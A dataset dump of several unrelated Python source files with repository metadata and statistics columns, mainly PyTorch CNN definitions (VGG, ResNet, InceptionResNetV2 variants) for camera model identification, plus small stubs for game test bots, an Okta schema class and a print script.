| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
10a17043fe87b2ca60ade27d6089e2c7e75b443e
| 170
|
py
|
Python
|
ffai/ai/bots/testbots/__init__.py
|
tysen2k/ffai
|
2fa1fd45a8877986fdb21e3fea5e01cbf819d3ec
|
[
"Apache-2.0"
] | null | null | null |
ffai/ai/bots/testbots/__init__.py
|
tysen2k/ffai
|
2fa1fd45a8877986fdb21e3fea5e01cbf819d3ec
|
[
"Apache-2.0"
] | null | null | null |
ffai/ai/bots/testbots/__init__.py
|
tysen2k/ffai
|
2fa1fd45a8877986fdb21e3fea5e01cbf819d3ec
|
[
"Apache-2.0"
] | null | null | null |
from .crash_bot import *
from .idle_bot import *
from .init_crash_bot import *
from .just_in_time_bot import *
from .manipulator_bot import *
from .violator_bot import *
| 24.285714
| 31
| 0.788235
| 27
| 170
| 4.62963
| 0.407407
| 0.432
| 0.52
| 0.288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141176
| 170
| 6
| 32
| 28.333333
| 0.856164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
52a5c36aef078acb6e645ea1893458ad86ef9085
| 27,985
|
py
|
Python
|
mephistopheies/kaggle_camera_model_id_lib/kaggle_camera_model_id_lib/models/models.py
|
cortwave/camera-model-identification
|
b2cbac93308bd6e1bc9d38391f5e97f48da99263
|
[
"BSD-2-Clause"
] | 6
|
2018-02-09T11:40:29.000Z
|
2021-06-14T06:08:50.000Z
|
mephistopheies/kaggle_camera_model_id_lib/kaggle_camera_model_id_lib/models/models.py
|
cortwave/camera-model-identification
|
b2cbac93308bd6e1bc9d38391f5e97f48da99263
|
[
"BSD-2-Clause"
] | null | null | null |
mephistopheies/kaggle_camera_model_id_lib/kaggle_camera_model_id_lib/models/models.py
|
cortwave/camera-model-identification
|
b2cbac93308bd6e1bc9d38391f5e97f48da99263
|
[
"BSD-2-Clause"
] | 7
|
2018-02-09T11:41:11.000Z
|
2021-06-14T06:08:52.000Z
|
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models as models
import pretrainedmodels
from pretrainedmodels.models.inceptionresnetv2 import BasicConv2d, Mixed_5b, Block35, Block17, Block8
from pretrainedmodels.models.inceptionresnetv2 import Mixed_6a, Mixed_7a
resnets = {
'resnet18': lambda: models.resnet18(pretrained=True),
'resnet34': lambda: models.resnet34(pretrained=True),
'resnet50': lambda: models.resnet50(pretrained=True),
'resnet101': lambda: models.resnet101(pretrained=True),
'resnet152': lambda: models.resnet152(pretrained=True)
}
cfg = {
'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
'E_2b': [64, 64, 'M', 128, 128, 'M'],
'E_3b': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M']
}
cfg_vgg_map = {
'A': lambda: models.vgg11(pretrained=True),
'B': lambda: models.vgg13(pretrained=True),
'D': lambda: models.vgg16(pretrained=True),
'E': lambda: models.vgg19(pretrained=True),
'E_2b': lambda: models.vgg19(pretrained=True),
'E_3b': lambda: models.vgg19(pretrained=True)
}
cfg_vgg_bn_map = {
'A': lambda: models.vgg11_bn(pretrained=True),
'B': lambda: models.vgg13_bn(pretrained=True),
'D': lambda: models.vgg16_bn(pretrained=True),
'E': lambda: models.vgg19_bn(pretrained=True),
'E_2b': lambda: models.vgg19_bn(pretrained=True),
'E_3b': lambda: models.vgg19_bn(pretrained=True)
}
def make_layers_vgg(cfg, batch_norm=False):
layers = []
in_channels = 3
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
return nn.Sequential(*layers)
class VggHead(nn.Module):
def _transfer_vgg_head(self, vgg_key, load_vgg_bn=False, batch_norm=False):
self.vgg = make_layers_vgg(cfg[vgg_key], batch_norm=batch_norm)
if load_vgg_bn:
if batch_norm:
vgg = cfg_vgg_bn_map[vgg_key]()
else:
vgg = cfg_vgg_map[vgg_key]()
keys = set(self.vgg.state_dict().keys())
self.vgg.load_state_dict(dict([(k, v) for (k, v) in vgg.features.state_dict().items() if k in keys]))
def _create_classifier(self, in_filters, num_classes):
self.project = nn.Conv2d(
in_filters, num_classes,
kernel_size=(1, 1), stride=(1, 1), padding=(0, 0),
bias=True)
self.bn = nn.BatchNorm2d(num_classes)
self.relu = nn.ReLU(inplace=True)
self.avgpool = nn.AdaptiveAvgPool2d(1)
def __init__(self, vgg_key, batch_norm=True, num_classes=10, load_vgg_bn=False):
super(VggHead, self).__init__()
self._transfer_vgg_head(load_vgg_bn=load_vgg_bn, vgg_key=vgg_key, batch_norm=batch_norm)
self._create_classifier(cfg[vgg_key][-2], num_classes)
def forward(self, x):
x = self.vgg(x)
x = self.project(x)
x = self.bn(x)
x = self.relu(x)
x = self.avgpool(x)
x = x.view(x.shape[0], x.shape[1])
return x
class StyleVggHead(VggHead):
def _create_classifier(self, num_classes):
self.fc1 = nn.Linear(8128, 4096)
self.bn1 = nn.BatchNorm1d(4096)
self.relu = nn.ReLU(inplace=True)
self.fc2 = nn.Linear(4096, 2048)
self.bn2 = nn.BatchNorm1d(2048)
self.fc3 = nn.Linear(2048, num_classes)
def __init__(self, vgg_key, batch_norm=True, num_classes=10, load_vgg_bn=False):
super(StyleVggHead, self).__init__(
num_classes,
load_vgg_bn=load_vgg_bn,
vgg_key=vgg_key,
batch_norm=batch_norm)
self._create_classifier(num_classes)
def forward(self, x):
x = self.vgg(x)
(b, c, h, w) = x.shape
x = x.view(b, c, w * h)
x = x.bmm(x.transpose(1, 2)) / (c * h * w)
x = torch.stack(
[torch.cat([torch.diag(x[j, :], i) for i in range(1, x.shape[1])])
for j in range(x.shape[0])])
x = self.fc1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.fc2(x)
x = self.bn2(x)
x = self.relu(x)
x = self.fc3(x)
return x
class IEEEfcn(nn.Module):
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
def __init__(self, num_classes=10):
super(IEEEfcn, self).__init__()
self.net = nn.Sequential(
nn.Conv2d(3, 32, kernel_size=(4, 4), stride=1),
nn.SELU(inplace=True),
nn.MaxPool2d(kernel_size=(2, 2), stride=2),
nn.Conv2d(32, 48, kernel_size=(5, 5), stride=1),
nn.SELU(inplace=True),
nn.MaxPool2d(kernel_size=(2, 2), stride=2),
nn.Conv2d(48, 64, kernel_size=(5, 5), stride=1),
nn.SELU(inplace=True),
nn.MaxPool2d(kernel_size=(2, 2), stride=2),
nn.Conv2d(64, 128, kernel_size=(5, 5), stride=1),
nn.SELU(inplace=True),
nn.Conv2d(128, num_classes, kernel_size=(1, 1), stride=1),
nn.SELU(inplace=True),
nn.AdaptiveAvgPool2d(1),
)
self._initialize_weights()
def forward(self, x):
x = self.net(x)
return x.squeeze()
class ResNetFC(nn.Module):
def __init__(self, block, layers, num_classes=1000, load_resnet='resnet18', pool_type='avg'):
self.inplanes = 64
super(ResNetFC, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.project = nn.Conv2d(
512*block.expansion, num_classes,
kernel_size=(1, 1), stride=(1, 1), padding=(0, 0),
bias=True)
self.bn2 = nn.BatchNorm2d(num_classes)
if pool_type == 'max':
self.avgpool = nn.AdaptiveMaxPool2d(1)
else:
self.avgpool = nn.AdaptiveAvgPool2d(1)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
if load_resnet is not None:
resnet = resnets[load_resnet]()
keys = set(self.state_dict().keys())
state_dict = self.state_dict()
state_dict.update(dict([(k, v) for (k, v) in resnet.state_dict().items() if k in keys]))
self.load_state_dict(state_dict)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.project(x)
x = self.bn2(x)
x = self.relu(x)
x = self.avgpool(x)
return x.squeeze()
class ResNetX(nn.Module):
def __init__(self, block, layers, num_classes=1000, load_resnet='resnet18', pool_type='avg'):
self.inplanes = 64
super(ResNetX, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
if pool_type == 'max':
self.avgpool = nn.AdaptiveMaxPool2d(1)
else:
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.fc1 = nn.Linear(512 * block.expansion, 512)
self.bn2 = nn.BatchNorm2d(512)
self.fc2 = nn.Linear(512, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
if load_resnet is not None:
resnet = resnets[load_resnet]()
keys = set(self.state_dict().keys())
state_dict = self.state_dict()
state_dict.update(dict([(k, v) for (k, v) in resnet.state_dict().items() if k in keys]))
self.load_state_dict(state_dict)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = self.fc1(x.squeeze())
x = self.bn2(x)
x = self.relu(x)
x = self.fc2(x)
return x
class InceptionResNetV2fc(nn.Module):
def __init__(self, num_classes=1001, nun_block35=10, num_block17=20, num_block8=9):
super(InceptionResNetV2fc, self).__init__()
# Modules
self.conv2d_1a = BasicConv2d(3, 32, kernel_size=3, stride=2)
self.conv2d_2a = BasicConv2d(32, 32, kernel_size=3, stride=1)
self.conv2d_2b = BasicConv2d(32, 64, kernel_size=3, stride=1, padding=1)
self.maxpool_3a = nn.MaxPool2d(3, stride=2)
self.conv2d_3b = BasicConv2d(64, 80, kernel_size=1, stride=1)
self.conv2d_4a = BasicConv2d(80, 192, kernel_size=3, stride=1)
self.maxpool_5a = nn.MaxPool2d(3, stride=2)
self.mixed_5b = Mixed_5b()
self.repeat = nn.Sequential(
*[Block35(scale=0.17) for i in range(nun_block35)]
)
self.mixed_6a = Mixed_6a()
self.repeat_1 = nn.Sequential(
*[Block17(scale=0.10) for i in range(num_block17)]
)
self.mixed_7a = Mixed_7a()
self.repeat_2 = nn.Sequential(
*[Block8(scale=0.20) for i in range(num_block8)]
)
self.block8 = Block8(noReLU=True)
self.conv2d_7b = BasicConv2d(2080, 1536, kernel_size=1, stride=1)
self.project = nn.Conv2d(
1536, num_classes,
kernel_size=(1, 1), stride=(1, 1), padding=(0, 0),
bias=True)
self.bn2 = nn.BatchNorm2d(num_classes)
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.relu = nn.ReLU(inplace=True)
def features(self, input):
x = self.conv2d_1a(input)
x = self.conv2d_2a(x)
x = self.conv2d_2b(x)
x = self.maxpool_3a(x)
x = self.conv2d_3b(x)
x = self.conv2d_4a(x)
x = self.maxpool_5a(x)
x = self.mixed_5b(x)
x = self.repeat(x)
x = self.mixed_6a(x)
x = self.repeat_1(x)
x = self.mixed_7a(x)
x = self.repeat_2(x)
x = self.block8(x)
x = self.conv2d_7b(x)
return x
def logits(self, features):
x = self.project(features)
x = self.bn2(x)
x = self.relu(x)
x = self.avgpool(x)
return x.squeeze()
def forward(self, input):
x = self.features(input)
x = self.logits(x)
return x
class InceptionResNetV2fcSmall(nn.Module):
def __init__(self, num_classes=1001, nun_block35=10, num_block17=20):
super(InceptionResNetV2fcSmall, self).__init__()
# Modules
self.conv2d_1a = BasicConv2d(3, 32, kernel_size=3, stride=2)
self.conv2d_2a = BasicConv2d(32, 32, kernel_size=3, stride=1)
self.conv2d_2b = BasicConv2d(32, 64, kernel_size=3, stride=1, padding=1)
self.maxpool_3a = nn.MaxPool2d(3, stride=2)
self.conv2d_3b = BasicConv2d(64, 80, kernel_size=1, stride=1)
self.conv2d_4a = BasicConv2d(80, 192, kernel_size=3, stride=1)
self.maxpool_5a = nn.MaxPool2d(3, stride=2)
self.mixed_5b = Mixed_5b()
self.repeat = nn.Sequential(
*[Block35(scale=0.17) for i in range(nun_block35)]
)
self.mixed_6a = Mixed_6a()
self.repeat_1 = nn.Sequential(
*[Block17(scale=0.10) for i in range(num_block17)]
)
self.project = nn.Conv2d(
1088, num_classes,
kernel_size=(1, 1), stride=(1, 1), padding=(0, 0),
bias=True)
self.bn2 = nn.BatchNorm2d(num_classes)
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.relu = nn.ReLU(inplace=True)
def features(self, input):
x = self.conv2d_1a(input)
x = self.conv2d_2a(x)
x = self.conv2d_2b(x)
x = self.maxpool_3a(x)
x = self.conv2d_3b(x)
x = self.conv2d_4a(x)
x = self.maxpool_5a(x)
x = self.mixed_5b(x)
x = self.repeat(x)
x = self.mixed_6a(x)
x = self.repeat_1(x)
return x
def logits(self, features):
x = self.project(features)
x = self.bn2(x)
x = self.relu(x)
x = self.avgpool(x)
return x.squeeze()
def forward(self, input):
x = self.features(input)
x = self.logits(x)
return x
class FatNet1(nn.Module):
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0, 0.01)
if m.bias is not None:
m.bias.data.zero_()
def __init__(self, num_classes=10):
super(FatNet1, self).__init__()
self.features = nn.Sequential(
nn.Conv2d(3, 128, 11, stride=1, bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.MaxPool2d(2, 2),
nn.Conv2d(128, 256, 7, stride=1, bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
nn.MaxPool2d(2, 2),
nn.Conv2d(256, 512, 5, stride=1, bias=False),
nn.BatchNorm2d(512),
nn.ReLU(),
nn.MaxPool2d(2, 2),
nn.Conv2d(512, 1024, 3, stride=1, bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(),
nn.MaxPool2d(2, 2),
nn.Conv2d(1024, 2048, 1, stride=1, bias=False),
nn.BatchNorm2d(2048),
nn.ReLU(),
nn.MaxPool2d(2, 2),
nn.Conv2d(2048, 4096, 3, stride=1, bias=False),
nn.BatchNorm2d(4096),
nn.ReLU(),
nn.AdaptiveAvgPool2d(1)
)
self.classifier = nn.Sequential(
nn.Dropout(0.5),
nn.Linear(4096, 2048, bias=False),
nn.BatchNorm1d(2048),
nn.ReLU(),
nn.Dropout(0.5),
nn.Linear(2048, 1024, bias=False),
nn.BatchNorm1d(1024),
nn.ReLU(),
nn.Linear(1024, num_classes, bias=True)
)
self._initialize_weights()
def forward(self, x):
x = self.features(x)
x = x.squeeze()
x = self.classifier(x)
return x
class InceptionResNetV2(nn.Module):
def __init__(self, num_classes=1001):
super(InceptionResNetV2, self).__init__()
# Special attributs
self.input_space = None
self.input_size = (299, 299, 3)
self.mean = None
self.std = None
# Modules
self.conv2d_1a = BasicConv2d(3, 32, kernel_size=3, stride=2)
self.conv2d_2a = BasicConv2d(32, 32, kernel_size=3, stride=1)
self.conv2d_2b = BasicConv2d(32, 64, kernel_size=3, stride=1, padding=1)
self.maxpool_3a = nn.MaxPool2d(3, stride=2)
self.conv2d_3b = BasicConv2d(64, 80, kernel_size=1, stride=1)
self.conv2d_4a = BasicConv2d(80, 192, kernel_size=3, stride=1)
self.maxpool_5a = nn.MaxPool2d(3, stride=2)
self.mixed_5b = Mixed_5b()
self.repeat = nn.Sequential(
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17),
Block35(scale=0.17)
)
self.mixed_6a = Mixed_6a()
self.repeat_1 = nn.Sequential(
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10),
Block17(scale=0.10)
)
self.mixed_7a = Mixed_7a()
self.repeat_2 = nn.Sequential(
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20),
Block8(scale=0.20)
)
self.block8 = Block8(noReLU=True)
self.conv2d_7b = BasicConv2d(2080, 1536, kernel_size=1, stride=1)
self.avgpool_1a = nn.AvgPool2d(8, count_include_pad=False)
self.last_linear = nn.Linear(1536, num_classes)
def features(self, input):
x = self.conv2d_1a(input)
x = self.conv2d_2a(x)
x = self.conv2d_2b(x)
x = self.maxpool_3a(x)
x = self.conv2d_3b(x)
x = self.conv2d_4a(x)
x = self.maxpool_5a(x)
x = self.mixed_5b(x)
x = self.repeat(x)
x = self.mixed_6a(x)
x = self.repeat_1(x)
x = self.mixed_7a(x)
x = self.repeat_2(x)
x = self.block8(x)
x = self.conv2d_7b(x)
return x
def logits(self, features):
x = self.avgpool_1a(features)
x = x.view(x.size(0), -1)
x = self.last_linear(x)
return x
def forward(self, input):
x = self.features(input)
x = self.logits(x)
return x
class ResNetDenseFC(nn.Module):
def __init__(self, block, layers, num_classes=1000, load_resnet='resnet18', zero_first_center=False):
self.zero_first_center = zero_first_center
self.inplanes = 64
super(ResNetDenseFC, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.maxpool8 = nn.MaxPool2d(8, stride=8)
self.maxpool4 = nn.MaxPool2d(4, stride=4)
self.maxpool2 = nn.MaxPool2d(2, stride=2)
self.project = nn.Conv2d(
960, num_classes,
kernel_size=(1, 1), stride=(1, 1), padding=(0, 0),
bias=True)
self.bn2 = nn.BatchNorm2d(num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
if load_resnet is not None:
resnet = resnets[load_resnet]()
keys = set(self.state_dict().keys())
state_dict = self.state_dict()
state_dict.update(dict([(k, v) for (k, v) in resnet.state_dict().items() if k in keys]))
self.load_state_dict(state_dict)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
if self.zero_first_center:
self.state_dict()['conv1.weight'][:, :, 3, 3] = 0.0
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x1 = self.layer1(x)
x2 = self.layer2(x1)
x3 = self.layer3(x2)
x4 = self.layer4(x3)
x1 = self.maxpool8(x1)
x2 = self.maxpool4(x2)
x3 = self.maxpool2(x3)
x = torch.cat([x1, x2, x3, x4], dim=1)
x = self.project(x)
x = self.bn2(x)
x = self.relu(x)
x = self.avgpool(x)
return x.squeeze()
class ResNetDense(nn.Module):
def __init__(self, block, layers, num_classes=1000, load_resnet='resnet18'):
self.inplanes = 64
super(ResNetDense, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.maxpool8 = nn.MaxPool2d(8, stride=8)
self.maxpool4 = nn.MaxPool2d(4, stride=4)
self.maxpool2 = nn.MaxPool2d(2, stride=2)
self.fc_new = nn.Linear(960, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
if load_resnet is not None:
resnet = resnets[load_resnet]()
keys = set(self.state_dict().keys())
state_dict = self.state_dict()
state_dict.update(dict([(k, v) for (k, v) in resnet.state_dict().items() if k in keys]))
self.load_state_dict(state_dict)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x1 = self.layer1(x)
x2 = self.layer2(x1)
x3 = self.layer3(x2)
x4 = self.layer4(x3)
x1 = self.maxpool8(x1)
x2 = self.maxpool4(x2)
x3 = self.maxpool2(x3)
x = torch.cat([x1, x2, x3, x4], dim=1)
x = self.avgpool(x)
x = self.fc_new(x.squeeze())
return x
| 34.85056
| 113
| 0.548008
| 3,702
| 27,985
| 4.007023
| 0.062939
| 0.037751
| 0.035594
| 0.022246
| 0.829648
| 0.808278
| 0.778212
| 0.751921
| 0.738102
| 0.729068
| 0
| 0.077896
| 0.319242
| 27,985
| 803
| 114
| 34.85056
| 0.700751
| 0.001465
| 0
| 0.728916
| 0
| 0
| 0.005727
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057229
| false
| 0
| 0.012048
| 0
| 0.118976
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
52a8cb7cfb37390bd4219947910258a280a171b7
| 182
|
py
|
Python
|
Bucles.py
|
jayounghoyos/My-Scripts
|
da7f3d39e0a19b4d01b5cef0627bbf892f655c80
|
[
"MIT"
] | null | null | null |
Bucles.py
|
jayounghoyos/My-Scripts
|
da7f3d39e0a19b4d01b5cef0627bbf892f655c80
|
[
"MIT"
] | null | null | null |
Bucles.py
|
jayounghoyos/My-Scripts
|
da7f3d39e0a19b4d01b5cef0627bbf892f655c80
|
[
"MIT"
] | null | null | null |
#contador = 0
#print("2 elevado a la" + str(contador) + " es igual a: " + str(2**contador))
contador = 1
print("2 elevado a la" + str(contador) + " es igual a: " + str(2**contador))
| 36.4
| 77
| 0.615385
| 30
| 182
| 3.733333
| 0.366667
| 0.107143
| 0.232143
| 0.25
| 0.839286
| 0.839286
| 0.839286
| 0.839286
| 0.839286
| 0.839286
| 0
| 0.040541
| 0.186813
| 182
| 5
| 78
| 36.4
| 0.716216
| 0.483516
| 0
| 0
| 0
| 0
| 0.290323
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
d80bd2bee57f097beb7da8e26adc0fee8e4645af
| 120
|
py
|
Python
|
okta/models/schema/AppUserProfileCustomSubschema.py
|
CloudRunnerInc/oktasdk-python
|
b2d19418d2bd0a8c1bbf3764a69e83c148e42a41
|
[
"Apache-2.0"
] | null | null | null |
okta/models/schema/AppUserProfileCustomSubschema.py
|
CloudRunnerInc/oktasdk-python
|
b2d19418d2bd0a8c1bbf3764a69e83c148e42a41
|
[
"Apache-2.0"
] | 3
|
2018-01-05T20:23:12.000Z
|
2019-03-06T12:00:58.000Z
|
okta/models/schema/AppUserProfileCustomSubschema.py
|
CloudRunnerInc/oktasdk-python
|
b2d19418d2bd0a8c1bbf3764a69e83c148e42a41
|
[
"Apache-2.0"
] | 1
|
2019-10-23T04:24:49.000Z
|
2019-10-23T04:24:49.000Z
|
from okta.models.schema import BaseCustomSubschema
class AppUserProfileCustomSubschema(BaseCustomSubschema):
pass
| 20
| 57
| 0.85
| 10
| 120
| 10.2
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108333
| 120
| 5
| 58
| 24
| 0.953271
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
dc4a855b09308772dc6825454d1a0894acd021ca
| 28,754
|
py
|
Python
|
train_epoch_variations.py
|
pbevan1/Skin-Deep-Unlearning
|
b8802db8bd61bbf3fdeb10c9899a4117ae38e89c
|
[
"MIT"
